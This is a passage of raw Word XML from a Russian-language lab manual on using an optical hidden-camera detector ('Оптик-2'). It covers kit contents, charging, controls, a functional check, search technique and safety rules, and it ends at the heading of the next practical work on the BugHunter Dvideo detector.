            <w:r w:rsidRPr="00BB40F5">
              <w:t>шт.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="285"/>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2.</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 xml:space="preserve">Встроенный аккумулятор </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB40F5">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Li</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB40F5">
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB40F5">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>ion</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB40F5">
              <w:t xml:space="preserve"> 3,7 В, 800-1200 мА</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r w:rsidRPr="00BB40F5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB40F5">
              <w:t>шт.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="207"/>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3.</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 xml:space="preserve">Зарядное устройство </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r w:rsidRPr="00BB40F5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB40F5">
              <w:t>шт.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="287"/>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4.</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Ремешок</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r w:rsidRPr="00BB40F5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB40F5">
              <w:t>шт.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="159"/>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5.</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Сумка транспортная</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r w:rsidRPr="00BB40F5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB40F5">
              <w:t>шт.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="7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6.</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xml:space="preserve">Инструкция по эксплуатации, паспорт           </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r w:rsidRPr="00BB40F5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB40F5">
              <w:t>шт.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:lastRenderedPageBreak/>
        <w:t>Зарядка аккумулятора.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve">     Заряд аккумулятора прибора осуществляется от зарядного устройства (5 В, 0,6 А) из комплекта поставки. Заряд осуществляется при выключенном приборе. Полностью разряженный прибор заряжается в течение 4 часов. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t>Вставьте зарядное устройство в сеть 220 В (50 Гц). Светодиод на зарядном устройстве должен загореться красным цветом при подключении к сети 220 В.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t>Подключите штекер зарядного устройства в разъём прибора с надписью +5</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB40F5">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve">. При подключении загорится индикатор </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB40F5">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>CNG</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve"> на приборе, подтверждающий начало заряда. Светодиод на зарядном устройстве при заряде горит красным цветом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve">По окончании заряда на приборе погаснет индикатор </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB40F5">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>CNG</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t>Отключите зарядное устройство от прибора, затем  от сети 220 В.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="0049237E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3055620" cy="975360"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Рисунок 7" descr="Описание: panel USB OPT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anel USB OPTIK-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620" cy="975360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t>Рис. 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t>Прибор готов к работе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t>Органы управления</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve">     Включение/выключение и переключение режимов осуществляется одной кнопкой </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB40F5">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Sele</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB40F5">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB40F5">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB40F5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve">  При длительном нажатии (более 2-х секунд) происходит включение/выключение прибора. При включённом приборе короткие нажатия на кнопку управления переключают режимы работы. При включении прибора будет работать режим работы, который был включён последним перед его выключением.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB40F5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve">     Настройка резкости прибора осуществляется центральным фокусировочным кольцом, расположенным в верхней части бинокуляра.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t>6.  Проверка работоспособности прибора</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve">     Установите на расстоянии 2-</w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="metricconverter">
        <w:smartTagPr>
          <w:attr w:name="ProductID" w:val="3 метра"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00BB40F5">
          <w:t>3 метра</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve"> тестовый объектив “</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB40F5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pinhole</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB40F5">
        <w:t>” (в комплект поставки не входит) таким образом, чтобы объектив смотрел на то место, где Вы будете находиться. Включив подсветку, проверьте, наблюдая в окуляры, видите ли Вы зелёное или красное точечное пятно в объективе. Аналогично будет видна и скрытая камера при проверке помещения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t>Порядок работы с прибором</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve">     Работа с прибором заключается в равномерном осмотре с его помощью проверяемого помещения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve">     ВАЖНО. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve">     Для обнаружения видеокамеры необходимо находиться в том месте, которое предположительно является объектом скрытого видеонаблюдения. Если ходить по помещению и просто осматривать интерьер через «Оптик-2», камера может быть не обнаружена.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve">     Например: Если предполагается ведение скрытого видеоконтроля стола руководителя, необходимо сесть в кресло руководителя и вести поиск именно с этой точки. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve">     При обнаружении бликующего точечного пятна необходимо осмотреть это место с близкого расстояния и определить источник блика.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     Основной режим работы прибора – непрерывный. Импульсный режим является дополнительным и используется при проверке в обычной световой обстановке. В затемнённом помещении рекомендуется использовать непрерывный режим. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t>На рис. 2, 3 показан пример выявленной видеокамеры</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:rPr>
          <w:lang w:bidi="ru-RU"/>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5pt;width:320pt;height:275.95pt;z-index:251621888;mso-position-horizontal:center" wrapcoords="-39 0 -39 21460 21561 21460 21561 0 -39 0">
            <v:imagedata r:id="rId14" o:title=""/>
            <w10:wrap type="square"/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Photoshop.Image.6" ShapeID="_x0000_s1028" DrawAspect="Content" ObjectID="_1756035129" r:id="rId15">
            <o:FieldCodes>\s</o:FieldCodes>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5"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Pr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t>Рис. 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB40F5">
        <w:t>оиск скрытых камер</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve">     Основным правилом при обнаружении скрытых камер является необходимость находиться в месте, которое вероятнее всего интересует лиц, установивших камеру (или между предполагаемым местом установки видеокамеры и местом съёмки).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve">     Вероятнее всего такими местами являются: места работы (столы с сидящими за ними людьми), места отдыха (кресла, диваны, кровати). В случае если интерес может представлять, посещало ли то или иное лицо помещение – камера может быть направленно на дверной проём.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve">     Необходимо учитывать, что видеокамер может быть несколько. Обнаружение одной или двух видеокамер не даёт право сделать вывод, что помещение проверенно. Для этого необходимо проверить все места, из которых возможен видеоконтроль.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:rPr>
          <w:lang w:bidi="ru-RU"/>
        </w:rPr>
        <w:object w:dxaOrig="0" w:dyaOrig="0">
          <v:shape id="_x0000_s1027" type="#_x0000_t75" style="position:absolute;margin-left:98.35pt;margin-top:8.1pt;width:267.4pt;height:230.6pt;z-index:251620864" wrapcoords="-39 0 -39 21460 21561 21460 21561 0 -39 0">
            <v:imagedata r:id="rId16" o:title=""/>
            <w10:wrap type="tight"/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Photoshop.Image.6" ShapeID="_x0000_s1027" DrawAspect="Content" ObjectID="_1756035130" r:id="rId17">
            <o:FieldCodes>\s</o:FieldCodes>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>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Pr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t>Рис. 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve">     Наиболее сложен поиск в помещениях с большим количеством бликующих объектов – большое количество зеркал, стекла и т.д. В случае обнаружения блика, мешающего осмотру какой-либо поверхности, необходимо сменить угол под которым осматривается поверхность. Зачастую достаточно переместиться на шаг и блик исчезнет. При этом блик от объектива останется. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     Необходимо при проверке помещений стараться не стоять под прямым углом к бликующей поверхности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve">     Видеокамеры могут быть установлены в любую деталь интерьера подходящую для такой установки. Это может быть подвесной потолок, видео- и аудиоаппаратура, картины, декоративные украшения и т.д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t xml:space="preserve">     Поиск значительно облегчается и яркость видимого пятна от засветки объектива возрастает, если в помещении нет прямых солнечных лучей. Нет необходимости «делать темноту» - достаточно создать нормальную для работы световую обстановку. При необходимости можно работать и практически в сторону Солнца, но при этом глаз оператора способен различить пятно объектива с 1-</w:t>
      </w:r>
      <w:smartTag w:uri="urn:schemas-microsoft-com:office:smarttags" w:element="metricconverter">
        <w:smartTagPr>
          <w:attr w:name="ProductID" w:val="2 метров"/>
        </w:smartTagPr>
        <w:r w:rsidRPr="00BB40F5">
          <w:t>2 метров</w:t>
        </w:r>
      </w:smartTag>
      <w:r w:rsidRPr="00BB40F5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BB40F5">
        <w:t>Данные рекомендации справедливы при работе с любым обнаружителем скрытых видеокамер, работающим по принципу обнаружения бликующих объектов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t>Правили техники безопасности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:t>В приборе установлены стеклянные оптические элементы. В случае разбития любого из них запрещается эксплуатация прибора во избежание получения травм.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:tab/>
        <w:t>Не наводить включенную подсветку на глаза людей. Кратковременная засветка глаз безопасна.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:tab/>
        <w:t>Избегать попадания прямых солнечных лучей и нагрева прибора.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:tab/>
        <w:t>Не разбирать и не бросать прибор.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00BB40F5">
        <w:tab/>
        <w:t>Не оставлять на длительное время под воздействием низких температур – прибор предназначен для работы в обычных помещениях при температуре от +5 до +40 градусов Цельсия</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB40F5">
        <w:tab/>
        <w:t>Для чистки загрязненной оптики используйте только салфетки предназначенные для протирки оптических устройств.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:t>Задания для выполнения лабораторной работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Проверить работоспособность прибора</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Осуществить поиск скрытых видеокамер(П)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc508029577"/>
      <w:bookmarkStart w:id="29" w:name="_Toc3808617"/>
      <w:r>
        <w:t>Практическая работа №9</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">. Обнаружение скрытых  проводных и беспроводных  видеокамер с помощью </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>оптического обнаружителя видеокамер BugHunter Dvideo</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Цель работы: на</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">учится применять </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t>оптическ</w:t>
      </w:r>
      <w:r>
        <w:t>ий</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve"> обнаружител</w:t>
      </w:r>
      <w:r>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve"> видеокамер</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для поиска закамуфлированных проводных и беспроводных камер.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>Теоретическая часть</w:t>
      </w:r>
    </w:p>
